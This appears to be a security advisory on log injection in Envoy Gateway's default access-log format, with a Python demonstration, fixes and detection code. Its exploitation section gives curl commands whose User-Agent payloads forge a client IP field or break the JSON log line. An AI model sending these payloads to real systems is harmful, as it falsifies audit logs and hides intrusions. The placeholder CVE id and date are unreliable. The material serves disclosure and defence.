Envoy Gateway, Log Injection Vulnerability, CVE-2023-XXXX (Critical)

How the Mentioned CVE Works:

Envoy Gateway versions before 1.2.7 (1.2.x line) and 1.3.1 (1.3.x line) ship a default access log format that is susceptible to log injection. The default format writes a JSON-shaped line as plain text, substituting request values such as the User-Agent header verbatim, without JSON escaping. A client who controls a request header can therefore close the current string value and append fields of their own. For example, a User-Agent of `HELLO-WORLD", "evil-ip": "1.1.1.1", "x-forwarded-for": "1.1.1.1` yields a line that still parses as JSON but now carries an attacker-supplied `evil-ip` field and a second `x-forwarded-for` key; parsers that keep the last occurrence of a repeated key report the attacker's value instead of the real client address, which corrupts exactly the fields security analysis relies on. A User-Agent containing a lone `"` instead produces a line that is not valid JSON at all, so observability pipelines that expect one JSON object per line drop or mis-parse it, further hiding the attacker's activity.
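The mechanism above, as an added example that is not Envoy Gateway's own code: a constructed, simplified text template that substitutes request values verbatim (the weak setting) beside the same record built as an object and serialised with escaping (the fix). The template, the field set and the client address 203.0.113.7 are assumptions for illustration.

```python
import json

# Constructed stand-in for a text-format access-log template: the JSON shape is
# literal text and every %...% operator is pasted in verbatim, with no escaping.
# This is a simplified illustration, not Envoy Gateway's actual default template.
VULNERABLE_TEMPLATE = (
    '{"start_time":"%START_TIME%","method":"%REQ(:METHOD)%",'
    '"x-forwarded-for":"%REQ(X-FORWARDED-FOR)%",'
    '"user-agent":"%REQ(USER-AGENT)%","response_code":"%RESPONSE_CODE%"}'
)


def render_text_format(values: dict) -> str:
    """Weak setting: plain string substitution, so a quote in a value escapes the field."""
    line = VULNERABLE_TEMPLATE
    for operator, value in values.items():
        line = line.replace(f"%{operator}%", value)
    return line


def render_json_format(values: dict) -> str:
    """Fixed setting: build the record as an object and let the serialiser escape values."""
    record = {
        "start_time": values["START_TIME"],
        "method": values["REQ(:METHOD)"],
        "x-forwarded-for": values["REQ(X-FORWARDED-FOR)"],
        "user-agent": values["REQ(USER-AGENT)"],
        "response_code": values["RESPONSE_CODE"],
    }
    return json.dumps(record)


def request_values(user_agent: str) -> dict:
    # Constructed request: real client 203.0.113.7, attacker-controlled User-Agent.
    return {
        "START_TIME": "2025-03-06T10:00:00.000Z",
        "REQ(:METHOD)": "GET",
        "REQ(X-FORWARDED-FOR)": "203.0.113.7",
        "REQ(USER-AGENT)": user_agent,
        "RESPONSE_CODE": "200",
    }


def parsed_xff(line: str):
    """What a JSON-per-line observability tool would read as the client address,
    or None when the line is not valid JSON (json.loads keeps the last duplicate key)."""
    try:
        return json.loads(line)["x-forwarded-for"]
    except json.JSONDecodeError:
        return None


# The two payloads from the write-up: one injects fields, one breaks the JSON.
INJECT_UA = 'HELLO-WORLD", "evil-ip": "1.1.1.1", "x-forwarded-for": "1.1.1.1'
BREAK_UA = '"'


def demo() -> dict:
    """Client address as seen through each format, for each payload."""
    results = {}
    for name, ua in (("inject", INJECT_UA), ("break", BREAK_UA)):
        results[name] = {
            "text": parsed_xff(render_text_format(request_values(ua))),
            "json": parsed_xff(render_json_format(request_values(ua))),
        }
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(name, outcome)
```

With the text format the injection payload makes the log report `1.1.1.1` as the client and the lone quote makes the line unparseable; with the JSON format both payloads end up as escaped string content and the real address survives.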

DailyCVE Form:

Platform: Envoy Gateway
Version: <1.2.7, <1.3.1
Vulnerability: Log Injection
Severity: Critical
Date: 2023-XX-XX

(End of form)

What Undercode Says:

Exploitation:

1. Craft Malicious User-Agent:

Use a payload like `HELLO-WORLD", "evil-ip": "1.1.1.1", "x-forwarded-for": "1.1.1.1` so the closing quote ends the user-agent value and the remainder is read as additional JSON fields.

Example (single quotes so the shell passes the double quotes through unchanged):

curl -H 'User-Agent: HELLO-WORLD", "evil-ip": "1.1.1.1", "x-forwarded-for": "1.1.1.1' http://target

2. Invalid JSON Injection:

Use a payload consisting of a single `"` so the resulting log line is no longer valid JSON.

Example:

curl -H 'User-Agent: "' http://target

Protection:

1. Update Envoy Gateway:

Upgrade to 1.2.7 on the 1.2.x line or 1.3.1 on the 1.3.x line; these releases change the default access log format to JSON, which escapes header values.

helm upgrade eg oci://docker.io/envoyproxy/gateway-helm --version v1.3.1 -n envoy-gateway-system

(The release name `eg` and the namespace `envoy-gateway-system` are the ones used in the project's quickstart; substitute your own.)

2. Apply JSON Log Format (workaround for versions that cannot be upgraded yet):

Configure `EnvoyProxy.spec.telemetry.accessLog` to use the JSON format explicitly, so every operator value is JSON-escaped instead of pasted into a text template. Attach the EnvoyProxy resource to your GatewayClass through `spec.parametersRef`.

Example YAML:

apiVersion: gateway.envoyproxy.io/v1alpha1
kind: EnvoyProxy
metadata:
  name: json-access-log
  namespace: envoy-gateway-system
spec:
  telemetry:
    accessLog:
      settings:
        - format:
            type: JSON
            json:
              start_time: '%START_TIME%'
              method: '%REQ(:METHOD)%'
              x-forwarded-for: '%REQ(X-FORWARDED-FOR)%'
              user-agent: '%REQ(USER-AGENT)%'
          sinks:
            - type: File
              file:
                path: /dev/stdout

3. Validate Logs:

Check that every access-log line parses as a JSON object before trusting it; lines that fail are either injected or were written by the unpatched text format.

Example:

while IFS= read -r line; do printf '%s\n' "$line" | jq -e 'type == "object"' >/dev/null 2>&1 || printf 'MALFORMED: %s\n' "$line"; done < envoy-access.log

Analytics:

  • Log Monitoring:
    Use tools like Elasticsearch or Splunk to detect anomalies in access logs.

Example query (assumes the index has a `user-agent.keyword` subfield, as dynamic string mapping creates by default; a literal quote inside a parsed user-agent value only appears once the format escapes it, so it flags injection attempts against a patched gateway):

{
  "query": {
    "wildcard": {
      "user-agent.keyword": {
        "value": "*\"*"
      }
    }
  }
}

  • Alerting:
    Alert on any access-log line that does not parse as a JSON object, on records carrying a key outside the configured format, and on records where the same key appears twice (the signature of the duplicate `x-forwarded-for` injection).

Example (pseudo-rule):

alert if not is_json_object(line) or (keys(record) - expected_keys) or has_duplicate_keys(line)
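A detection pass over constructed sample lines, added here as an example that is not part of the original post or of Envoy Gateway; it covers the "Validate Logs", "Log Monitoring" and "Alerting" points above in one place. The sample lines, the expected key set and the field names are assumptions that mirror the JSON format shown in the Protection section.

```python
import json

# Constructed sample access-log lines (not real Envoy Gateway output), one JSON
# object per line as a log pipeline would receive them:
#   0: a clean record
#   1: a vulnerable text-format line after the injection User-Agent (duplicate key, extra field)
#   2: a vulnerable text-format line after a lone '"' User-Agent (no longer valid JSON)
#   3: the injection User-Agent as written by the fixed JSON format (escaped, harmless)
SAMPLE_LINES = [
    '{"start_time":"2025-03-06T10:00:00Z","x-forwarded-for":"203.0.113.7","user-agent":"curl/8.5.0","response_code":"200"}',
    '{"start_time":"2025-03-06T10:00:01Z","x-forwarded-for":"203.0.113.7","user-agent":"HELLO-WORLD", "evil-ip": "1.1.1.1", "x-forwarded-for": "1.1.1.1","response_code":"200"}',
    '{"start_time":"2025-03-06T10:00:02Z","x-forwarded-for":"203.0.113.7","user-agent":""","response_code":"200"}',
    '{"start_time":"2025-03-06T10:00:03Z","x-forwarded-for":"203.0.113.7","user-agent":"HELLO-WORLD\\", \\"evil-ip\\": \\"1.1.1.1\\", \\"x-forwarded-for\\": \\"1.1.1.1","response_code":"200"}',
]

# Keys the configured access-log format is allowed to emit (assumed; matches the
# JSON format in the Protection section).
EXPECTED_KEYS = {"start_time", "x-forwarded-for", "user-agent", "response_code"}
DUP_MARKER = "__duplicate_keys__"


def keep_duplicates(pairs):
    """object_pairs_hook: json.loads silently keeps the last value of a repeated
    key, so record which keys repeated and make the injection visible after parsing."""
    record, dups = {}, []
    for key, value in pairs:
        if key in record and key not in dups:
            dups.append(key)
        record[key] = value
    record[DUP_MARKER] = dups
    return record


def classify(line: str) -> dict:
    """Findings for one log line. Records are flat, so the marker sits at top level only."""
    try:
        record = json.loads(line, object_pairs_hook=keep_duplicates)
    except json.JSONDecodeError:
        return {"findings": ["malformed_json"], "x_forwarded_for": None}
    if not isinstance(record, dict):
        return {"findings": ["not_an_object"], "x_forwarded_for": None}
    findings = []
    dups = record.pop(DUP_MARKER)
    if dups:
        findings.append("duplicate_keys:" + ",".join(dups))
    extra = sorted(set(record) - EXPECTED_KEYS)
    if extra:
        findings.append("unexpected_keys:" + ",".join(extra))
    # A literal quote inside the parsed User-Agent means the format escaped it
    # (patched gateway) but a client still sent an injection-shaped header.
    if '"' in record.get("user-agent", ""):
        findings.append("quote_in_user_agent")
    return {"findings": findings, "x_forwarded_for": record.get("x-forwarded-for")}


def scan(lines):
    """Classify every line; any entry with findings is worth an alert."""
    return [classify(line) for line in lines]


if __name__ == "__main__":
    for i, result in enumerate(scan(SAMPLE_LINES)):
        print(i, result)
```

Line 1 is the dangerous case for an analyst: it parses cleanly, and a naive `json.loads` would report `1.1.1.1` as the client address, so the duplicate-key check is what surfaces the tampering. Line 3 shows why alerting on a quote inside the user-agent is still useful after patching: the gateway is no longer fooled, but the probe is worth knowing about.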

Commands:

  • Check Envoy Gateway Version (the controller image tag, not the Envoy proxy binary; release name and namespace as in the quickstart):
    kubectl -n envoy-gateway-system get deploy envoy-gateway -o jsonpath='{.spec.template.spec.containers[0].image}'
    
  • Apply Workaround:
    kubectl apply -f envoy-config.yaml
    
  • Test Log Injection (then confirm the logged user-agent is escaped and no `test-ip` field appears):
    curl -H 'User-Agent: TEST", "test-ip": "1.1.1.1' http://localhost
    

References:

Reported By: https://github.com/advisories/GHSA-mf24-chxh-hmvj